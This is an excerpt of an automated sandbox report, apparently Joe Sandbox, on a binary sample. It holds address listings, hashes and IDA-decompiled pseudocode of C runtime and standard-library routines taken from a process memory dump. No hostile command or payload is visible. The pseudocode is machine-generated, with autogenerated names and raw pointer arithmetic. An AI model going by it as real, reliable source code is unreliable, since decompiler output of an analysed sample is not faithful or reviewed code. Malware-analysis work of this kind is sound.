0x00408d14
0x00408d19
0x00408d1c
0x00408d1d
0x00408d1f
0x00408e4c
0x00000000
0x00408d25
0x00408d25
0x00408d28
0x00408d2d
0x00408d30
0x00408d33
0x00408d36
0x00408d38
0x00408d65
0x00408d67
0x00408d69
0x00408d6b
0x00408d74
0x00408d76
0x00408d78
0x00408d7b
0x00408d7b
0x00408d7e
0x00408d84
0x00408d93
0x00408d95
0x00408da7
0x00408da7
0x00408d97
0x00408d98
0x00408d9d
0x00408da0
0x00408da3
0x00408da3
0x00000000
0x00408d86
0x00408d86
0x00408d86
0x00408d89
0x00408d8b
0x00408e51
0x00408e51
0x00000000
0x00408d91
0x00000000
0x00408d91
0x00408d8b
0x00408d6d
0x00408d6d
0x00000000
0x00408d6d
0x00408d3a
0x00408d3a
0x00408d3c
0x00408d41
0x00408d41
0x00408d44
0x00408d45
0x00408d4a
0x00408d4d
0x00408d4f
0x00408e56
0x00408e56
0x00408e5b
0x00408e5c
0x00408e5d
0x00408e5e
0x00408e5f
0x00408e60
0x00408e62
0x00408e64
0x004071d0
0x004071d1
0x004071d3
0x004071d7
0x0040723d
0x0040723e
0x004071d9
0x004071dc
0x004071dd
0x004071de
0x004071eb
0x00407201
0x0040720a
0x0040721e
0x0040721e
0x00407220
0x00407228
0x0040722e
0x00407235
0x00000000
0x0040720c
0x0040720c
0x0040720f
0x00407212
0x0040721a
0x0040723f
0x00407244
0x00407245
0x00407246
0x00407247
0x00407248
0x00407249
0x0040724a
0x0040724b
0x0040724c
0x0040724d
0x0040724e
0x0040724f
0x00407250
0x00407253
0x00407257
0x00407258
0x0040725a
0x00407260
0x00407262
0x00407265
0x0040726a
0x00407271
0x0040721c
0x0040721c
0x00000000
0x0040721c
0x0040721a
0x0040720a
0x00408e6a
0x00408e6a
0x00408e6a
0x00408d55
0x00408d55
0x00408d58
0x00408d5b
0x00408d5e
0x00408da9
0x00408dac
0x00408db3
0x00408db9
0x00408dbc
0x00408dc1
0x00408dc4
0x00408dc8
0x00408dcb
0x00408dcc
0x00408e23
0x00408e24
0x00408e25
0x00408e31
0x00408e3c
0x00408e41
0x00408e49
0x00408dce
0x00408dce
0x00408dd0
0x00408dd1
0x00408dd2
0x00408de0
0x00408de8
0x00408dee
0x00408def
0x00408df2
0x00408df8
0x00408e0c
0x00408e0c
0x00408e0e
0x00408e16
0x00408e20
0x00408dfa
0x00408dfa
0x00408dfd
0x00408e00
0x00408e02
0x00408e05
0x00408e08
0x00000000
0x00408e0a
0x00408e0a
0x00000000
0x00408e0a
0x00408e08
0x00408df8
0x00408dcc
0x00408d4f
0x00408d38
0x00408bd5
0x00408bd5
0x00408bd8
0x00408bdb
0x00408bde
0x00408c29
0x00408c2c
0x00408c33
0x00408c36
0x00408c3b
0x00408c3e
0x00408c42
0x00408c45
0x00408c4d
0x00408c50
0x00408c54
0x00408c57
0x00408cb9
0x00408cba
0x00408cbb
0x00408cc7
0x00408cd2
0x00408cd8
0x00408ce0
0x00408cea
0x00408c59
0x00408c59
0x00408c5b
0x00408c5c
0x00408c5d
0x00408c6b
0x00408c7c
0x00408c84
0x00408c87
0x00408c88
0x00408c8e
0x00408ca2
0x00408ca2
0x00408ca4
0x00408cac
0x00408cb6
0x00408c90
0x00408c90
0x00408c93
0x00408c96
0x00408c98
0x00408c9b
0x00408c9e
0x00000000
0x00408ca0
0x00408ca0
0x00000000
0x00408ca0
0x00408c9e
0x00408c8e
0x00408c57
0x00408bcf
0x00408bb8
0x00408a95
0x00408a95
0x00408a98
0x00408a9b
0x00408a9e
0x00408ae9
0x00408ae9
0x00408af0
0x00408af3
0x00408af6
0x00408af7
0x00408b48
0x00408b49
0x00408b4a
0x00408b4f
0x00408b5a
0x00408b5d
0x00408b62
0x00408b6a
0x00408af9
0x00408af9
0x00408afb
0x00408afc
0x00408afd
0x00408b02
0x00408b05
0x00408b0e
0x00408b0f
0x00408b12
0x00408b17
0x00408b1d
0x00408b31
0x00408b31
0x00408b33
0x00408b3b
0x00408b45
0x00408b1f
0x00408b1f
0x00408b22
0x00408b25
0x00408b27
0x00408b2a
0x00408b2d
0x00000000
0x00408b2f
0x00408b2f
0x00000000
0x00408b2f
0x00408b2d
0x00408b1d
0x00408af7
0x00408a8f
0x00408a78
0x00408a03
0x00408a03
0x00000000
0x00408a03
0x00408a01
0x004089f1
0x00000000
0x00408a0f
0x00408a0f
0x00408a16
0x00408a1d
0x00408a20
0x00408a23
0x00408a23
0x00000000
0x004089e0
0x00408980
0x00408980
0x00408983
0x00408987
0x0040898b
0x00408990
0x00408997
0x0040899a
0x00000000
0x0040899a
0x00408968
0x00408968
0x00000000
0x00408968
0x00408957
0x0040895d
0x00000000
0x0040895d
0x00408955
0x0040894b
0x0040893e
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004088D6
std::_Lockit::_Lockit.LIBCPMT ref: 004088F9
std::_Lockit::~_Lockit.LIBCPMT ref: 00408919
std::_Facet_Register.LIBCPMT ref: 0040898B
std::_Lockit::~_Lockit.LIBCPMT ref: 004089A3
Concurrency::cancel_current_task.LIBCPMT ref: 004089C6

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6ad374c1b7a56b3c7ab2eed5f2fdba7a828b2bb9b1b450fb738bde060c8403dc
Instruction ID: 10bc4d083f0d6e5c5aa0492e0be468e715e6825d79f5f8a935fa4fa3640798b7
Opcode Fuzzy Hash: 6ad374c1b7a56b3c7ab2eed5f2fdba7a828b2bb9b1b450fb738bde060c8403dc
Instruction Fuzzy Hash: 7041AEB5900219CFCB11DF54E941BAEB7B0FB44724F14026EE885B7391DB38AA44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004169FC Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E004169FC(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x443070 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00417C03(_t13,  *0x443070);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00417C3E(_t14,  *0x443070, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0041823E();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00417C3E(_t18,  *0x443070, 0);
								} else {
									_t8 = E00417C3E(_t18,  *0x443070, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0041AC1E(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x004169fc
0x00416a03
0x00416a16
0x00416a1d
0x00416a1f
0x00416a23
0x00416a3c
0x00416a3c
0x00416a25
0x00416a27
0x00416a3a
0x00416a41
0x00416a4a
0x00416a4d
0x00416a50
0x00416a64
0x00416a64
0x00416a6d
0x00416a52
0x00416a59
0x00416a5f
0x00416a62
0x00416a76
0x00416a78
0x00000000
0x00000000
0x00000000
0x00416a62
0x00416a7b
0x00000000
0x00000000
0x00000000
0x00416a3a
0x00416a27
0x00416a83
0x00416a8d
0x00416a05
0x00416a07
0x00416a07

APIs

GetLastError.KERNEL32(?,?,004169F3,0041485F,00413F7C), ref: 00416A0A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00416A18
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00416A31
SetLastError.KERNEL32(00000000,004169F3,0041485F,00413F7C), ref: 00416A83

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9ec1a021ddd549f0be519d21b65f3f0f9f2e13021d0e121cb48fd4b589579ae6
Instruction ID: a981a94b709aa5c5a0bfd01837c0d8f69c1e546bffa9a62c7f10e9c9c22eb78a
Opcode Fuzzy Hash: 9ec1a021ddd549f0be519d21b65f3f0f9f2e13021d0e121cb48fd4b589579ae6
Instruction Fuzzy Hash: 1C01D43620D2116EA6242BB5BE856E726A4DF037BA331833FF510611E5FF198D8256CC

Uniqueness

Uniqueness Score: -1.00%

Function 00416B13 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00416B13(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x441b50);
				E00413FF0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00414BF0(_t107, E004147DF(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00414BF0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x4447a4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x4331a4();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0041D1C9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x441b70);
									E00413FF0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00416B13(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00417822(_t103, _t108[0x18], E004147DF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00417832(_t103, _t108[0x18], E004147DF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E004147DF();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00416b13
0x00416b15
0x00416b1a
0x00416b1f
0x00416b21
0x00416b24
0x00416b29
0x00416c39
0x00416c39
0x00416c39
0x00000000
0x00416b38
0x00416b38
0x00416b3d
0x00416b47
0x00416b49
0x00416b4e
0x00416b53
0x00416b53
0x00416b55
0x00416b58
0x00416b5d
0x00416b7f
0x00416b7f
0x00416b82
0x00416b85
0x00416ba3
0x00416ba6
0x00416be5
0x00416be8
0x00416beb
0x00416c10
0x00416c12
0x00000000
0x00416c14
0x00416c14
0x00416c16
0x00000000
0x00416c18
0x00416c18
0x00416c1d
0x00416c21
0x00416c21
0x00416c22
0x00000000
0x00416c22
0x00416c16
0x00416bed
0x00416bed
0x00416bef
0x00000000
0x00416bf1
0x00416bf1
0x00416bf3
0x00000000
0x00416bf5
0x00416c06
0x00000000
0x00416c0b
0x00416bf3
0x00416bef
0x00416ba8
0x00416ba8
0x00416bac
0x00000000
0x00416bb2
0x00416bb2
0x00416bb4
0x00000000
0x00416bba
0x00416bc1
0x00416bc9
0x00416bcd
0x00416bcf
0x00416bd2
0x00416bd7
0x00416bd8
0x00000000
0x00416bd8
0x00416bd2
0x00000000
0x00416bcd
0x00416bb4
0x00416bac
0x00416b87
0x00416b87
0x00000000
0x00416b87
0x00416b64
0x00416b64
0x00416b69
0x00416b6e
0x00000000
0x00416b70
0x00416b72
0x00416b7b
0x00416b8a
0x00416b8c
0x00416c4b
0x00416c4b
0x00416c50
0x00416c51
0x00416c53
0x00416c58
0x00416c5d
0x00416c60
0x00416c63
0x00416c66
0x00416c6f
0x00416c6f
0x00416c68
0x00416c68
0x00416c68
0x00416c72
0x00416c76
0x00416c79
0x00416c7a
0x00416c7b
0x00416c7c
0x00416c7f
0x00416c88
0x00416c88
0x00416c8b
0x00416cc1
0x00416c8d
0x00416c8d
0x00416c8d
0x00416c90
0x00416ca7
0x00416ca7
0x00416c90
0x00416cc6
0x00416cd0
0x00416cdc
0x00416b9a
0x00416b9a
0x00416b9f
0x00416ba0
0x00416bda
0x00416be1
0x00416c25
0x00416c25
0x00416c2c
0x00416c3b
0x00416c3e
0x00416c4a
0x00416c4a
0x00416b8c
0x00416b6e
0x00000000
0x00000000
0x00000000
0x00416b3d

APIs

___AdjustPointer.LIBCMT ref: 00416BDA
___AdjustPointer.LIBCMT ref: 00416BFD
___AdjustPointer.LIBCMT ref: 00416C99

Strings

0'@, xrefs: 00416B72

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: AdjustPointer
String ID: 0'@
API String ID: 1740715915-1999884151
Opcode ID: bc92206df1d550dbcf48c1ae3c435f5c764ffe0b3c4c8167624a7138c2748150
Instruction ID: 349f1c95a76813cf8c56dd8e4b04975026008980cbef37f8812b81d4e85a4b47
Opcode Fuzzy Hash: bc92206df1d550dbcf48c1ae3c435f5c764ffe0b3c4c8167624a7138c2748150
Instruction Fuzzy Hash: FA510172604212AFDB288F15D941BEA77A4EF10304F12452FEC8687290F739ECC1CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403B40 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00403B40(void* __ebx, intOrPtr __edx, void* __edi) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v116;
				intOrPtr _v140;
				char _v192;
				char _v196;
				char _v200;
				intOrPtr* _v204;
				char _v208;
				void* __esi;
				void* __ebp;
				signed int _t85;
				signed int _t86;
				long _t103;
				void* _t116;
				void* _t124;
				void* _t130;
				intOrPtr* _t133;
				void* _t140;
				intOrPtr* _t153;
				intOrPtr* _t155;
				void* _t161;
				void* _t162;
				signed int _t163;
				void* _t164;
				void* _t166;

				_t158 = __edi;
				_t157 = __edx;
				_t135 = __ebx;
				_push(0xffffffff);
				_push(0x4316e0);
				_push( *[fs:0x0]);
				_t85 =  *0x443048; // 0x35200185
				_t86 = _t85 ^ _t163;
				_v20 = _t86;
				_push(_t86);
				 *[fs:0x0] =  &_v16;
				_v200 = 0;
				E00415180(__edi,  &_v196, 0, 0xb0);
				_v196 = 0x43ea74;
				_t161 =  >=  ?  *0x443aa4 : 0x443aa4;
				_v84 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_t166 = _t164 - 0xc0 + 8;
				_v8 = 0;
				_v200 = 1;
				_v92 = 0x43ea98;
				_v96 = 0x60;
				E00407F70( &_v92, _t157,  *0x443ab8 - 0x10,  &_v192);
				_v8 = 2;
				_t17 =  &_v196; // 0x43ea74
				 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t17 + 4)) - 0xc0)) = 0x43ea70;
				_t21 =  &_v196; // 0x43ea70
				_t23 =  *((intOrPtr*)( *_t21 + 4)) - 0x68; // -102
				 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t21 + 4)) - 0xc4)) = _t23;
				E00407040( &_v192,  *0x443ab8 - 0x10);
				_v8 = 3;
				if(_v116 != 0) {
					L5:
					_t39 =  &_v196; // 0x43ea70
					_t40 =  &_v196; // 0x43ea70
					_t140 = _t40 +  *((intOrPtr*)( *_t39 + 4));
					 *(_t140 + 0x38) = 0x00000002 + ( *(_t140 + 0x38) == 0x00000000) * 0x00000004 |  *(_t140 + 0xc);
					E00403A00(_t135, _t140, 0x00000002 + ( *(_t140 + 0x38) == 0x00000000) * 0x00000004 |  *(_t140 + 0xc), 0);
					L6:
					_v8 = 5;
					_t103 = GetCurrentProcessId();
					_t49 =  &_v196; // 0x43ea70
					E004059F0(_t49, _t157, _t103);
					if(E00406F50( &_v192) == 0) {
						_t51 =  &_v196; // 0x43ea70
						_t52 =  &_v196; // 0x43ea70
						E00403A00(_t135, _t52 +  *((intOrPtr*)( *_t51 + 4)), 0x00000002 + (0 |  *((intOrPtr*)(_t52 +  *((intOrPtr*)( *_t51 + 4)) + 0x38)) == 0x00000000) * 0x00000004 |  *(_t52 +  *((intOrPtr*)( *_t51 + 4)) + 0xc), 0);
					}
					_t60 =  &_v196; // 0x43ea70
					 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t60 + 4)) - 0xc0)) = 0x43ea70;
					_t64 =  &_v196; // 0x43ea70
					_t66 =  *((intOrPtr*)( *_t64 + 4)) - 0x68; // -99
					 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t64 + 4)) - 0xc4)) = _t66;
					E00405690( &_v192);
					_t70 =  &_v196; // 0x43ea70
					 *((intOrPtr*)(_t163 +  *((intOrPtr*)( *_t70 + 4)) - 0xc0)) = 0x43ea98;
					_t75 = _v196 + 4; // 0x74636576
					_t76 =  *_t75 - 8; // 0x7463656e
					 *((intOrPtr*)(_t163 +  *_t75 - 0xc4)) = _t76;
					_v8 = 6;
					_v92 = 0x43ea28;
					_t116 = E004128AD( &_v92);
					 *[fs:0x0] = _v16;
					_pop(_t162);
					return E0041361E(_t116, _t135, _v20 ^ _t163, _t157, _t158, _t162);
				}
				_push(0x40);
				_push(2);
				_t124 = E00412A0C(_t157, 0x443aa4);
				_t166 = _t166 + 0xc;
				if(_t124 == 0) {
					goto L5;
				} else {
					E00406E40( &_v192, _t124, 1);
					_t153 =  *((intOrPtr*)(_v140 + 4));
					_v204 = _t153;
					 *((intOrPtr*)( *_t153 + 4))();
					_v8 = 4;
					_push( &_v208);
					_t130 = E00408400(__ebx, _t157, _t158, _t161);
					_t166 = _t166 + 4;
					E00406CE0( &_v192, _t130);
					_t155 = _v204;
					if(_t155 != 0) {
						_t133 =  *((intOrPtr*)( *_t155 + 8))();
						if(_t133 != 0) {
							_t157 =  *_t133;
							 *((intOrPtr*)( *_t133))(1);
						}
					}
					goto L6;
				}
			}

0x00403b40
0x00403b40
0x00403b40
0x00403b43
0x00403b45
0x00403b50
0x00403b57
0x00403b5c
0x00403b5e
0x00403b62
0x00403b66
0x00403b77
0x00403b84
0x00403b95
0x00403b9f
0x00403ba6
0x00403bad
0x00403bb4
0x00403bbb
0x00403bc2
0x00403bc5
0x00403bd2
0x00403bdf
0x00403be6
0x00403bee
0x00403bf3
0x00403bfa
0x00403c03
0x00403c0e
0x00403c17
0x00403c1a
0x00403c27
0x00403c2c
0x00403c34
0x00403ca5
0x00403ca5
0x00403cab
0x00403cb3
0x00403cc5
0x00403cc9
0x00403cce
0x00403cce
0x00403cd5
0x00403cdc
0x00403ce2
0x00403cf4
0x00403cf6
0x00403cfc
0x00403d1a
0x00403d1a
0x00403d1f
0x00403d28
0x00403d33
0x00403d3c
0x00403d3f
0x00403d4c
0x00403d51
0x00403d5a
0x00403d6b
0x00403d6e
0x00403d71
0x00403d7b
0x00403d83
0x00403d8a
0x00403d95
0x00403d9d
0x00403dab
0x00403dab
0x00403c36
0x00403c38
0x00403c3b
0x00403c40
0x00403c45
0x00000000
0x00403c47
0x00403c50
0x00403c5b
0x00403c5e
0x00403c66
0x00403c6f
0x00403c73
0x00403c74
0x00403c79
0x00403c83
0x00403c88
0x00403c90
0x00403c94
0x00403c99
0x00403c9b
0x00403ca1
0x00403ca1
0x00403c99
0x00000000
0x00403c90

APIs

Part of subcall function 00407F70: std::locale::_Init.LIBCPMT ref: 00408002

Part of subcall function 00407040: std::locale::_Init.LIBCPMT ref: 00407092

GetCurrentProcessId.KERNEL32(00000000,?,35200185), ref: 00403CD5
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00403D8A

Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408436
Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408458
Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F

Strings

`, xrefs: 00403BE6
(C, xrefs: 00403D78, 00403D82
tC, xrefs: 00403BFA, 00403C0E, 00403CA5, 00403CAB, 00403CDC, 00403D1F, 00403D33, 00403D51, 00403CF6, 00403CFC

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Lockitstd::_$InitLockit::_Lockit::~_std::locale::_$CurrentIos_base_dtorProcessstd::ios_base::_
String ID: (C$`$tC
API String ID: 1043075861-338296439
Opcode ID: 276fa40c52f5c62e5dde265c5b1a3fd0a8075afff4ce2ed28c94f6f59bc9857e
Instruction ID: d2221ce5aec08ae90bd4016673533955d953cbb34cf6aa8034e8684be79d6cfe
Opcode Fuzzy Hash: 276fa40c52f5c62e5dde265c5b1a3fd0a8075afff4ce2ed28c94f6f59bc9857e
Instruction Fuzzy Hash: 48612C74A01218DFEB10DF65CD89F9ABBB8FF04308F1445AEE509AB291D779AA44CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00423963 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00423963(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t77;
				signed int _t78;
				char _t79;
				char _t80;
				intOrPtr* _t81;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t95;
				signed char _t99;
				signed char _t102;
				signed char _t108;
				intOrPtr _t109;
				signed int _t117;
				signed int _t118;
				intOrPtr _t123;
				signed int _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t130;
				signed int _t131;
				intOrPtr _t137;

				_t77 = E0042087B(_a4);
				_t135 = _t77;
				_v24 = 2;
				_t78 = _t77 >> 6;
				_v36 = _t78;
				_t117 = (_t77 & 0x0000003f) * 0x38;
				_t79 =  *((intOrPtr*)(0x444b30 + _t78 * 4));
				_v32 = _t79;
				_v8 = 0;
				_v28 = _t117;
				_t80 =  *((intOrPtr*)(_t117 + _t79 + 0x29));
				_v20 = _t80;
				if(_t80 != 1) {
					_v24 = 1;
				}
				_t81 = _a4;
				_t118 =  *((intOrPtr*)(_t81 + 8));
				_v16 = _t118;
				if(_t118 != 0) {
					asm("cdq");
					_v12 = _t130;
					asm("cdq");
					_t84 = _v12;
					_v16 =  *_t81 -  *((intOrPtr*)(_t81 + 4)) + _v16;
					_t23 =  &_v32; // 0x423939
					_t123 =  *_t23;
					asm("adc eax, edx");
					_t131 = _v28;
					_v12 = _t84;
					__eflags =  *((char*)(_t131 + _t123 + 0x28));
					_t124 = _v16;
					if( *((char*)(_t131 + _t123 + 0x28)) < 0) {
						_t31 =  &_a24; // 0x423939
						_t85 = E00425445(_t135, 0, 0, 2,  *_t31);
						__eflags = _t85 - _a8;
						if(_t85 != _a8) {
							L13:
							_t87 = E00425445(_t135, _a8, _a12, 0, _a24) & _t131;
							_t131 = _t131 | 0xffffffff;
							__eflags = _t87 - _t131;
							if(_t87 != _t131) {
								__eflags = _v12;
								if(__eflags > 0) {
									L21:
									asm("cdq");
									_v12 =  *((intOrPtr*)(_a4 + 0x18));
									L22:
									_t90 = _v28;
									_t126 =  *((intOrPtr*)(0x444b30 + _v36 * 4));
									__eflags =  *(_t90 + _t126 + 0x28) & 0x00000004;
									if(( *(_t90 + _t126 + 0x28) & 0x00000004) == 0) {
										_t124 = _v12;
										L28:
										_push(_v8);
										_t113 = _v24;
										_push(_v24);
										_push(_t131);
										L29:
										_push(_t124);
										_t91 = E00430EB0();
										_t92 = E00430EB0(_a16, _a20, _t113, _v8);
										asm("sbb edx, edi");
										asm("adc edx, [ebp+0x10]");
										return _t92 - _t91 + _a8;
									}
									_t95 = _v20;
									__eflags = _t95 - 1;
									if(_t95 == 1) {
										L25:
										_push(2);
										_pop(1);
										L26:
										_t127 = _v12;
										L12:
										_t124 = _t127 + 1;
										asm("adc edx, edi");
										goto L28;
									}
									__eflags = _t95 - 2;
									if(_t95 != 2) {
										goto L26;
									}
									goto L25;
								}
								_v12 = 0x200;
								if(__eflags < 0) {
									L18:
									_t99 =  *(_a4 + 0xc) >> 6;
									__eflags = 1 & _t99;
									if((1 & _t99) == 0) {
										goto L21;
									}
									_t102 =  *(_a4 + 0xc) >> 8;
									__eflags = 1 & _t102;
									if((1 & _t102) != 0) {
										goto L21;
									}
									_t131 = 0;
									goto L22;
								}
								__eflags = _v16 - 0x200;
								if(_v16 > 0x200) {
									goto L21;
								}
								goto L18;
							}
							return _t131;
						}
						__eflags = _t131 - _a12;
						if(_t131 != _a12) {
							goto L13;
						}
						_t137 = _a4;
						_t124 = E00423CCD( *((intOrPtr*)(_t137 + 4)), _v16 +  *((intOrPtr*)(_t137 + 4)), _v20) + _v16;
						asm("adc edx, [ebp-0x8]");
						_t108 =  *(_t137 + 0xc) >> 5;
						__eflags = 1 & _t108;
						if((1 & _t108) == 0) {
							goto L28;
						}
						_t109 = _v20;
						__eflags = _t109 - 1;
						if(_t109 == 1) {
							L11:
							_push(2);
							_pop(1);
							goto L12;
						}
						__eflags = _t109 - 2;
						if(_t109 != 2) {
							goto L12;
						}
						goto L11;
					}
					_push(_v8);
					_t113 = _v24;
					_push(_v24);
					_push(_t84);
					goto L29;
				} else {
					return _a8;
				}
			}

0x00423971
0x00423976
0x00423978
0x00423980
0x00423988
0x0042398b
0x00423993
0x0042399a
0x0042399d
0x004239a0
0x004239a3
0x004239a7
0x004239ac
0x004239ae
0x004239ae
0x004239b1
0x004239b4
0x004239b7
0x004239bc
0x004239d0
0x004239d3
0x004239d9
0x004239dc
0x004239df
0x004239e2
0x004239e2
0x004239e5
0x004239e7
0x004239ea
0x004239ed
0x004239f2
0x004239f5
0x00423a04
0x00423a0c
0x00423a14
0x00423a17
0x00423a64
0x00423a74
0x00423a79
0x00423a7c
0x00423a7e
0x00423a87
0x00423a8a
0x00423abb
0x00423ac1
0x00423ac2
